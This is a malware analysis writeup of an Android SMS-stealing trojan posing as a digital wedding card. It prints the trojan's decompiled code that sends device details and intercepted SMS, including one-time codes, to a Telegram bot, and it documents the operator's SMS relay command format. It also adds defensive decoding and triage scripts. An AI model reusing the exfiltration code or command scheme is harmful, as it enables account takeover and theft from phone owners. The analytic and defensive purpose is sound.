Kad Kahwin SMS Logger
⚠️ Under Construction ⚠️
First of all, we extend our heartfelt gratitude to Mr. Fareed Fauzi for his invaluable guidance, as well as to the CyberSecurity Malaysia team for generously providing the sample.
File Information
File Name: KAD KAHWIN DIGITAL.apk
Package Name: com.rndytech.smstest
Size: 4.92MB
I want arif to find out what the function of the hash is, since his Discord name is hash_kira lemao
MD5: a21bc85e2275c90305d9a2a14d7a6664
SHA1: a5e22c9a97ebd7ca3f14d11341b0fbc093221ccb
SHA256: 982b360b0cf8fcd0dec00f233cdeeb191876d4301dd8e62e75ff2909a5b03cfc
Analysis
Application Permission
Malicious applications abuse Android permissions for a range of illegitimate purposes.
Interestingly, no application permission was found by MobSF.
![[Pasted image 20240506202246.png]]
So we take a closer look at the AndroidManifest.xml file. Why?
Because the AndroidManifest.xml file is where an app declares the system permissions that the user must grant for it to function properly.
MobSF is supposed to collect every permission declared in the AndroidManifest.xml file.
```xml
<?xml version="1.0" encoding="utf-8"?>
<manifest package="com.rndytech.smstest" platformBuildVersionCode="32" platformBuildVersionName="13" android:versionCode="1" android:versionName="1.0" android:compileSdkVersion="32" android:compileSdkVersionCodename="13" android:tag="" android:tag=""
xmlns:android="http://schemas.android.com/apk/res/android">
```
But still nothing is found. This might be an anti-analysis technique by the threat actor, so we are left with one option: analyse the source code and find where the threat actor asks the user for application permissions.
```java
// Decompiled fragment of MainActivity: pick the WebView layer type by API level
// (2 = View.LAYER_TYPE_HARDWARE on API 19+, 1 = View.LAYER_TYPE_SOFTWARE on API 11-18).
if (Build.VERSION.SDK_INT >= 19) {
    this.webviewku.setLayerType(2, null);
} else if (Build.VERSION.SDK_INT >= 11 && Build.VERSION.SDK_INT < 19) {
    this.webviewku.setLayerType(1, null);
}
// Runtime permission prompts (API 23+). checkSelfPermission() != 0 means the
// permission is not PERMISSION_GRANTED, so the user is asked for it.
if (Build.VERSION.SDK_INT >= 23 && checkSelfPermission("android.permission.SEND_SMS") != 0 && checkSelfPermission("android.permission.READ_SMS") != 0) {
    requestPermissions(new String[]{"android.permission.SEND_SMS", "android.permission.READ_SMS"}, 2000);
}
if (Build.VERSION.SDK_INT < 23 || checkSelfPermission("android.permission.RECEIVE_SMS") == 0) {
    return;
}
requestPermissions(new String[]{"android.permission.RECEIVE_SMS"}, 1000);
```
Voilà. Here, in com/example/myapplication/MainActivity.java,
it is stated that the application will ask the user for the following permissions:
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.RECEIVE_SMS
I want derf to find out what the functions of SEND_SMS and READ_SMS are
I want arif to find out what the function of RECEIVE_SMS is
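Android only grants a runtime permission that the manifest also declares with a `<uses-permission>` element, so a source file that calls requestPermissions() for SEND_SMS, READ_SMS and RECEIVE_SMS while the decoded manifest shows no permissions at all is a contradiction worth resolving before calling it anti-analysis. The manifest snippet quoted above also carries `android:tag=""` twice, which a strict XML parser rejects as a duplicate attribute; one possibility worth checking is that this is what left the permission table in MobSF empty. The script below is an added example written for this writeup (it is not part of the sample, of MobSF or of any other tool); it cross-checks a decoded manifest against decompiled source, falls back to a regex scan when the manifest is not well-formed, and reports permissions requested at runtime but never declared. The manifest and source strings it contains are constructed samples modelled on the fragments above.

```python
"""Cross-check manifest permissions against runtime requestPermissions() calls."""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample: the manifest header as the writeup shows it (note the
# repeated android:tag attribute) with no <uses-permission> elements at all.
SAMPLE_MANIFEST = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<manifest package="com.rndytech.smstest" android:tag="" android:tag="" '
    'xmlns:android="http://schemas.android.com/apk/res/android">\n'
    '  <application android:label="">\n'
    '  </application>\n'
    '</manifest>\n'
)

# Constructed sample: the runtime requests as decompiled from MainActivity.java.
SAMPLE_SOURCE = '''
if (Build.VERSION.SDK_INT >= 23 && checkSelfPermission("android.permission.SEND_SMS") != 0) {
    requestPermissions(new String[]{"android.permission.SEND_SMS", "android.permission.READ_SMS"}, 2000);
}
requestPermissions(new String[]{"android.permission.RECEIVE_SMS"}, 1000);
'''

PERM_RE = re.compile(r'"(android\.permission\.[A-Z_]+)"')
USES_PERM_RE = re.compile(r'<uses-permission\s+[^>]*android:name="([^"]+)"')


def manifest_permissions(xml_text):
    """Return (declared permissions, note). A strict parse is attempted first; a
    manifest that is not well-formed (for example duplicate attributes) falls
    back to a regex scan so the analyst still gets a result plus the reason."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        perms = set(USES_PERM_RE.findall(xml_text))
        return perms, f"manifest is not well-formed XML ({exc}); used regex fallback"
    perms = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    return {p for p in perms if p}, "ok"


def runtime_requested_permissions(java_text):
    """Permission strings passed to requestPermissions(...) in decompiled source."""
    perms = set()
    for call in re.finditer(r"requestPermissions\s*\((.*?)\)\s*;", java_text, re.S):
        perms.update(PERM_RE.findall(call.group(1)))
    return perms


def cross_check(xml_text, java_text):
    """Compare declared and runtime-requested permissions; the gap is the finding."""
    declared, note = manifest_permissions(xml_text)
    requested = runtime_requested_permissions(java_text)
    return {
        "declared": sorted(declared),
        "requested_at_runtime": sorted(requested),
        "requested_but_undeclared": sorted(requested - declared),
        "manifest_note": note,
    }


if __name__ == "__main__":
    for key, value in cross_check(SAMPLE_MANIFEST, SAMPLE_SOURCE).items():
        print(f"{key}: {value}")
```

On the constructed sample the strict parse fails on the duplicate attribute, the fallback finds no declarations, and all three SMS permissions land in requested_but_undeclared. In a real case that result means either the manifest decode is incomplete (re-decode with another tool and compare) or the permissions genuinely cannot be granted, and the analyst should settle which before drawing conclusions.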
Code Analysis
Here MobSF states that:
The app logs (records) sensitive information of the user.
The application is vulnerable because it is debuggable, and a production application must not be debuggable.
![[Pasted image 20240506205838.png]]
Malicious Code in MainActivity.java
Before the application starts, it asks for user permissions as stated before.
```java
// Same MainActivity fragment as in the Application Permission section.
if (Build.VERSION.SDK_INT >= 19) {
    this.webviewku.setLayerType(2, null);
} else if (Build.VERSION.SDK_INT >= 11 && Build.VERSION.SDK_INT < 19) {
    this.webviewku.setLayerType(1, null);
}
if (Build.VERSION.SDK_INT >= 23 && checkSelfPermission("android.permission.SEND_SMS") != 0 && checkSelfPermission("android.permission.READ_SMS") != 0) {
    requestPermissions(new String[]{"android.permission.SEND_SMS", "android.permission.READ_SMS"}, 2000);
}
if (Build.VERSION.SDK_INT < 23 || checkSelfPermission("android.permission.RECEIVE_SMS") == 0) {
    return;
}
requestPermissions(new String[]{"android.permission.RECEIVE_SMS"}, 1000);
```
After the permissions are granted, the threat actor appears to create a facade of legitimacy for the application by loading content from an external website, confirmed to be owned by a different company, ejemputan, into the application.
![[Pasted image 20240507165355.png|300]]
```java
// Decompiled fragment: the decoy UI is a WebView pointed at a third party's site.
WebView webView = (WebView) findViewById(R.id.my_web);
this.webviewku = webView;
WebSettings settings = webView.getSettings();
this.websettingku = settings;
settings.setJavaScriptEnabled(true);
this.webviewku.setWebViewClient(new WebViewClient());   // keeps navigation inside the app
this.webviewku.loadUrl("https://ejemputan.com/kadkahwindigital");
```
Apart from that, the code immediately notifies its C2C (command and control server) with information about the victim's device; in this case the C2C is a Telegram bot/account.
```java
// Decompiled fragment: device profile built from android.os.Build fields.
// Note that the last label reads "Product" but the value appended is Build.TIME.
String device = "ID : " + Build.ID + "\n - User : " + Build.USER + "\n - Product : " + Build.PRODUCT + "\n - Brand : " + Build.BRAND + "\n - Device : " + Build.DEVICE + "\n - Board : " + Build.BOARD + "\n - BOOTLOADER : " + Build.BOOTLOADER + "\n - DISPLAY : " + Build.DISPLAY + "\n - FINGERPRINT : " + Build.FINGERPRINT + "\n - HARDWARE : " + Build.HARDWARE + "\n - HOST : " + Build.HOST + "\n -MANUFACTURER : " + Build.MANUFACTURER + "\n - MODEL : " + Build.MODEL + "\n -TAGS : " + Build.TAGS + "\n - TYPE : " + Build.TYPE + "\n - Product : " + Build.TIME + "\n - ";
```
Victim's device information logged:
ID
User
Product
Brand
Device
Board
Bootloader
Display
Fingerprint
Hardware
Host
Manufacturer
Model
Tags
Type
Product (labelled "Product" a second time, but the value is actually Build.TIME)
Note that two different Request objects are used to send messages to the actor's C2C: build and build2.
```java
// Decompiled fragment: two OkHttp requests to the Telegram Bot API sendMessage endpoint.
// The bot token is redacted; the chat_id identifies the actor's Telegram chat.
Request build = new Request.Builder().url("https://api.telegram.org/{REDACTED}sdBc2OFVj8CdEQNr9G1lVlY5K8I/sendMessage?parse_mode=markdown&chat_id=5876222887&text= DETECT SMS - Hak Cipta LanaGt : \n" + this.device).build();
Request build2 = new Request.Builder().url("https://api.telegram.org/{REDACTED}sdBc2OFVj8CdEQNr9G1lVlY5K8I/sendMessage?parse_mode=markdown&chat_id=5876222887&text= 𝐀𝐩𝐥𝐢𝐤𝐚𝐬𝐢 𝐓𝐞𝐫𝐢𝐧𝐬𝐭𝐚𝐥 \n Detail Perangkat : \n" + this.device).build();
```
To further analyse the information sent to the C2C, we can intercept the requests between the application and the Telegram bot using Burp Suite.
An Android emulator was used to act as the dummy victim's phone.
Communication of build object. ![[Pasted image 20240508120154.png]]
Communication of build2 object. ![[Pasted image 20240508120221.png]]
Decoded URL of the text sent on build object ![[Pasted image 20240508120408.png]]
Decoded URL of the text sent on build2 object ![[Pasted image 20240508120340.png]]
Malicious Code in ReceiveSms.java
This file acts as a listener that waits for incoming SMS messages received by the victim's phone. Once triggered, it grabs the sender's phone number together with the content of the message and sends them to the C2C. ![[carbon (3).png]]
The communication was intercepted using Burp Suite. To test the code we created dummy data, a random phone number and a bait TAC message, to mimic what is usually sent to a victim by SMS. ![[photo_2024-05-08_11-45-03.jpg]]
Communication of build object ![[Pasted image 20240508121953.png]]
Decoded URL message that was sent to the C2C:
```text
Pesan Detect SMS, SMS from :
6505551212
, Pesan :RM0 myASNB Portal: Forgot Password Request. TAC is 514749. Exp by 03/05/2024 08:10:27 MYT
```
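The Burp captures in this section and in the previous one are the same kind of artefact: an HTTP GET to api.telegram.org/bot<token>/sendMessage whose query string carries the actor's chat_id and a URL-encoded text that is either the device profile (build and build2) or a forwarded SMS in the "Pesan Detect SMS, SMS from : ..., Pesan :..." layout. The script below is an added example written for this writeup, not code from the sample, MobSF or Burp. It parses a raw request as the proxy shows it, confirms the destination, decodes the text, classifies it as a device profile or an SMS forward, and for forwards splits out the sender and body and flags six-digit codes such as the TAC in the bait message. The capture it contains is constructed from the screenshots: the chat_id and message text are the ones above, the bot token is a placeholder and not the sample's real token.

```python
"""Decode a Telegram Bot API exfiltration request captured with Burp."""
import re
from urllib.parse import parse_qs, urlsplit

TOKEN_RE = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]+)/(\w+)$")
# Message shape produced by ReceiveSms.java: "Pesan Detect SMS, SMS from : <number>, Pesan :<body>"
FORWARD_RE = re.compile(r"Pesan Detect SMS, SMS from :\s*(\S+)\s*, Pesan :(.*)", re.S)
OTP_RE = re.compile(r"\b\d{6}\b")  # six-digit codes, like the TAC in the bait SMS

# Constructed capture modelled on the Burp screenshots: placeholder bot token,
# chat_id and text as given in the writeup (%0A are the line breaks).
SAMPLE_REQUEST = (
    "GET /bot123456789:PLACEHOLDER-TOKEN/sendMessage?parse_mode=markdown"
    "&chat_id=5876222887&text=Pesan%20Detect%20SMS%2C%20SMS%20from%20%3A%20%0A6505551212%0A"
    "%2C%20Pesan%20%3ARM0%20myASNB%20Portal%3A%20Forgot%20Password%20Request.%20TAC%20is%20514749."
    "%20Exp%20by%2003%2F05%2F2024%2008%3A10%3A27%20MYT HTTP/1.1\r\n"
    "Host: api.telegram.org\r\n\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, request-target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def decode_exfil(raw):
    """Describe a Telegram sendMessage call, or return None for other traffic."""
    _method, target, headers = parse_request(raw)
    if headers.get("host") != "api.telegram.org":
        return None
    parts = urlsplit(target)
    m = TOKEN_RE.match(parts.path)
    if not m:
        return None
    token, api_method = m.groups()
    qs = parse_qs(parts.query)  # percent-decodes the values, so no second unquote
    text = qs.get("text", [""])[0]
    result = {
        "bot_id": token.split(":", 1)[0],  # numeric bot id only; the secret half stays out of reports
        "api_method": api_method,
        "chat_id": qs.get("chat_id", [""])[0],
        "text": text,
        "kind": "other",
    }
    # build/build2 carry the device profile; ReceiveSms.java carries a forwarded SMS.
    if "Detail Perangkat" in text or "DETECT SMS" in text:
        result["kind"] = "device_profile"
    fwd = FORWARD_RE.search(text)
    if fwd:
        sender, body = fwd.groups()
        result.update(kind="sms_forward", sms_sender=sender.strip(),
                      sms_body=body.strip(), otp_candidates=OTP_RE.findall(body))
    return result


if __name__ == "__main__":
    for key, value in decode_exfil(SAMPLE_REQUEST).items():
        print(f"{key}: {value!r}")
```

Feed it the request text from Burp's Raw tab (or from a PCAP of the emulator's traffic) and the output is the chat_id to pivot on and the list of codes that were exposed. Only the numeric half of the bot token is reported, so a captured token cannot leak again through the analysis notes.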
Malicious Code in SendSMS.java
Here is how the threat actor can silently intercept SMS messages and relay them to a newly specified phone number.
First, the threat actor sends a message that looks like this to the victim's phone number:
```text
55555&012765310#Sending this malicious text to the specified phone number....
```
When the SMS is received on the victim's phone, the code splits the message into three parts, separated by the & and # characters:
str3, which acts as the command code: 55555
str4, which acts as the other victim's phone number: 0127650310
str5, which acts as the text message to send to the other phone number: Sending this malicious text to the specified phone number....
Outcome
Once it is confirmed that the str3 code is 55555, it proceeds to send a text message (the content of str5) to the phone number extracted into the variable str4.
The C2C is also notified when the message is sent successfully.
![[carbon (4).png]]
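The command format above, <code>&<number>#<text> with 55555 as the arming code, is a usable detection signature: any inbound SMS of that shape on a device running this sample is an operator instruction, not user traffic. The script below is an added example written for this writeup, not code from the sample. It is a triage helper that a responder can run over SMS exported from an infected phone (or that a mobile threat-defence rule could apply to inbound SMS) to flag command-shaped messages and report whether the code would have armed the relay. The inbox it contains is constructed; the activation code and message layout are the ones documented above.

```python
"""Flag inbound SMS that match the operator command format parsed by SendSMS.java."""
import re

ACTIVATION_CODE = "55555"  # the str3 value SendSMS.java checks before relaying

# Approximates the malware's split: the code up to the first '&', the destination
# number up to the first '#', and everything after that as the text to send.
COMMAND_RE = re.compile(r"^(?P<code>\d{3,8})&(?P<number>\+?\d{6,15})#(?P<text>.*)$", re.S)

# Constructed inbox as (sender, body); the first two bodies are command-shaped.
SAMPLE_INBOX = [
    ("+15555550100", "55555&0127650310#Sending this malicious text to the specified phone number...."),
    ("+15555550100", "12345&0127650310#ping"),
    ("myASNB", "RM0 myASNB Portal: Forgot Password Request. TAC is 514749."),
]


def parse_command(body):
    """Return code/number/text for a command-shaped SMS, or None otherwise."""
    m = COMMAND_RE.match(body.strip())
    if m is None:
        return None
    return {
        "code": m["code"],
        "number": m["number"],
        "text": m["text"],
        "armed": m["code"] == ACTIVATION_CODE,  # only this code triggers the relay
    }


def triage(inbox):
    """Collect every command-shaped SMS with its sender and armed flag."""
    findings = []
    for sender, body in inbox:
        cmd = parse_command(body)
        if cmd is not None:
            findings.append({"from": sender, **cmd})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_INBOX):
        print(finding)
```

A message with the right shape but the wrong code is still worth recording: it shows the operator reaching the device, and the sender number is a lead for the attribution work in the next section.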
Anti-Analysis Techniques
![[Pasted image 20240507175453.png]]
When the application is downloaded, the victim won't be able to find it in the main menu, since it is hidden by its 'null' (empty) name. We also couldn't find it at first; however, when taking a look at Settings > All apps, it was shown at the very top of the list.
Furthermore, the application permissions were hidden by the actor; refer to the Application Permission section above for more details.
Finding out the Threat Actor
MobSF has a find-content feature that filters all of the code by the expression/string we want to find. If we first filter on the API bot, we see random phone numbers lying in the source code, and their country code is Indonesia's.
![[Pasted image 20240508130307.png]]
![[Pasted image 20240508130214.png]]
![[Pasted image 20240508130247.png]]
Based on the previous find, we also found that the messages sent to the Telegram C2C were mostly written in Indonesian too.
For example, "Aplikasi Terinstal Detail Perangkat" (Indonesian for "Application installed, device details"). ![[Pasted image 20240508173759.png]]
It reads as Indonesian, so we were 90% sure that the threat actor is from Indonesia.
Lesson Learned
Malicious Purposes of the Application
SMS Interception
This application has the malicious capability to send, receive and read SMS messages. It intercepts incoming SMS messages, extracts the sender information and message content, and sends this data to a C2C.
So the actors can extract sensitive information such as One-Time Passwords (OTPs), which are commonly used as a Two-Factor Authentication (2FA) technique nowadays. With access to incoming OTPs, they can initiate unauthorized account takeovers on various platforms, including email, social media, banking applications, and more.
Tools for APK Analysis
MobSF is an automated all-in-one mobile application malware analysis and security assessment framework. ![[ec45ab80-b46b-11e9-9f7f-6db13d2e8507.png]]
[An Android Virtual Device (AVD) is a device configuration that the Android Emulator runs on your desktop; this is how we performed the dynamic analysis.](https://developer.android.com/studio/run/managing-avds#:~:text=An%20Android%20Virtual%20Device%20(AVD,simulate%20in%20the%20Android%20Emulator.) ![[51121362-9420c200-1817-11e9-9eae-64a72b2fc5b9.png]]
Burp Suite can intercept the communication between an application and its back-end server. You can modify the requests too, but you need to set up the proxy connection first. ![[6321a0f076706854ff591093_All about BurpSuite.jpg]]